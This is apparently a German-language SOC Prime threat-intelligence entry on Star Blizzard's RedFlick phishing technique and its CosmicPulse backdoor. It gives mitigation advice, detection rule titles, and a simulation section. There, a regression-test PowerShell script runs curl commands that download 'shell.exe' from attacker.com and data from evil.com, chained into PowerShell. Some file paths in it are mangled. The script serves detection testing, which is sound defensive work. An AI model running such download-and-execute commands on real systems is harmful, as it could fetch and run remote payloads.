SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

Star Blizzard verwendet RedFlick zur Verbesserung von Phishing- und Malware-Bereitstellungen

Author Photo
SOC Prime Team linkedin icon Folgen
Star Blizzard verwendet RedFlick zur Verbesserung von Phishing- und Malware-Bereitstellungen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der russische staatlich gesponserte Akteur Star Blizzard hat seine Vorgehensweise mit der RedFlick-Technik weiterentwickelt, um die CosmicPulse-Hintertür zu liefern. Der Akteur hat sich von hochgradig gezielten Spear-Phishing-Angriffen zu groß angelegten automatisierten Phishing-Kampagnen mit kompromittierten Websites verlagert. Diese Kampagnen nutzen ausgeklügelte Zustellmethoden, einschließlich VHDX-Dateien und Nutzlasten, die in PDF-Dateien versteckt sind, um der Erkennung zu entgehen.

Untersuchung

Microsoft Threat Intelligence analysierte verschiedene Phishing-Wellen, die im Laufe des Jahres 2026 beobachtet wurden, und identifizierte einen Übergang von ClickFix-basierten Ketten zu RedFlick-Planungsaufgaben. Die Untersuchung beschrieb einen mehrstufigen Ausführungsablauf, der LNK-Dateien, lokale SSH-Befehlsausführung und die Verwendung von WebDAV zur Remote-Nutzlastabholung umfasste. Die technische Analyse deckte auch die Verwendung von Steganographie und registrierungsbasierter Verschlüsselung für die CosmicPulse-Nutzlast auf.

Minderung

Organisationen sollten eine phishingsichere Authentifizierung und bedingte Zugriffsrichtlinien implementieren, um Identitäten zu sichern. Endpunkt-Schutz sollte mit EDR im Blockmodus und aktiviertem Echtzeit-Antivirenschutz konfiguriert werden. Darüber hinaus können durch die Implementierung von Regeln zur Reduzierung der Angriffsfläche die Ausführung verschleierter Skripte und nicht autorisierter ausführbarer Dateien verhindert werden.

Antwort

Nach einer Entdeckung sollten Sicherheitsteams EDR nutzen, um bösartige Artefakte zu beheben und verdächtige Anmeldeversuche zu untersuchen. Automatische Untersuchungs- und Wiederherstellungsmodi sollten aktiviert werden, um Reaktionszeiten zu verkürzen. Organisationen sollten auch fortschrittliche Anti-Phishing-Lösungen und Zero-Hour-Autopurge verwenden, um eingehende bösartige Kommunikation zu neutralisieren.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Verdächtige Befehlszeilen enthalten UNC-Pfad mit Ausführbarem als Argument (über cmdline)

SOC Prime Team
30. Sep. 2026

Mögliche Netzfreigabe-Erkennung (über cmdline)

SOC Prime Team
30. Sep. 2026

Verdächtige MsiExec Remote Installer Versteckte Installationsversuche (über cmdline)

SOC Prime Team
30. Sep. 2026

LOLBAS Conhost (über cmdline)

SOC Prime Team
30. Sep. 2026

Mögliche Tunneling Tool Nutzung [Windows] (über cmdline)

SOC Prime Team
30. Sep. 2026

Verdächtige CURL-Nutzung (über cmdline)

SOC Prime Team
30. Sep. 2026

Verdächtige Steuerung und Kontrolle durch unübliche Top-Level-Domain (TLD) DNS-Anfragen (über dns)

SOC Prime Team
30. Sep. 2026

IOCs (HashSha256) zum Erkennen: Star Blizzard verbessert Phishing- und Malware-Zustellung mit der RedFlick-Technik

SOC Prime AI Regeln
30. Sep. 2026

IOCs (SourceIP) zum Erkennen: Star Blizzard verbessert Phishing- und Malware-Zustellung mit der RedFlick-Technik

SOC Prime AI Regeln
30. Sep. 2026

IOCs (DestinationIP) zum Erkennen: Star Blizzard verbessert Phishing- und Malware-Zustellung mit der RedFlick-Technik

SOC Prime AI Regeln
30. Sep. 2026

Erkennung der PowerShell-Ausführung aus Download-PDF [Windows Powershell]

SOC Prime AI Regeln
30. Sep. 2026

Erkennung der Star Blizzard RedFlick-Technik – Geplante Aufgaben und Befehlszeilenausführung [Windows Prozesskonstruktion]

SOC Prime AI Regeln
30. Sep. 2026

Simulationsausführung

  • Angriffserzählung & Befehle: Der Angreifer liefert eine Phishing-E-Mail mit einem Link zu einer bösartigen Datei. Bei Interaktion wird eine Sequenz ausgelöst, bei der curl verwendet wird, um eine sekundäre Phase abzurufen. Um sich mit Systemprozessen zu vermischen, wird der Befehl so gestaltet, dass er ausdrücklich die Begriffe PowerShell, PDF (unter Bezugnahme auf die Quelle des Auslösers) und conhost.exe in der Befehlszeilenzeichenfolge enthält, um der Logik der Zielerkennungsregel zu entsprechen. Das Ziel ist die Ausführung einer decodierten Nutzlast, die innerhalb einer PDF-Struktur eingebettet ist.

  • Regressionstest-Skript:

    # Simulation Skript zur Auslösung der 'Erkennung der PowerShell-Ausführung aus Download-PDF' Regel.
    # Dieses Skript konstruiert eine Befehlszeilenzeichenfolge, die alle vier erforderlichen Schlüsselwörter enthält.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extrahieren aus PDF...'; Start-Process conhost.exe}"
    
    # Wir führen über cmd aus, um sicherzustellen, dass conhost.exe Teil des Prozessbaums/Befehlskontextes ist
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extrahieren aus PDF... mit conhost.exe`""
  • Aufräumbefehle:

    # Aufräumen von Dateien, die während der Simulation generiert wurden
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue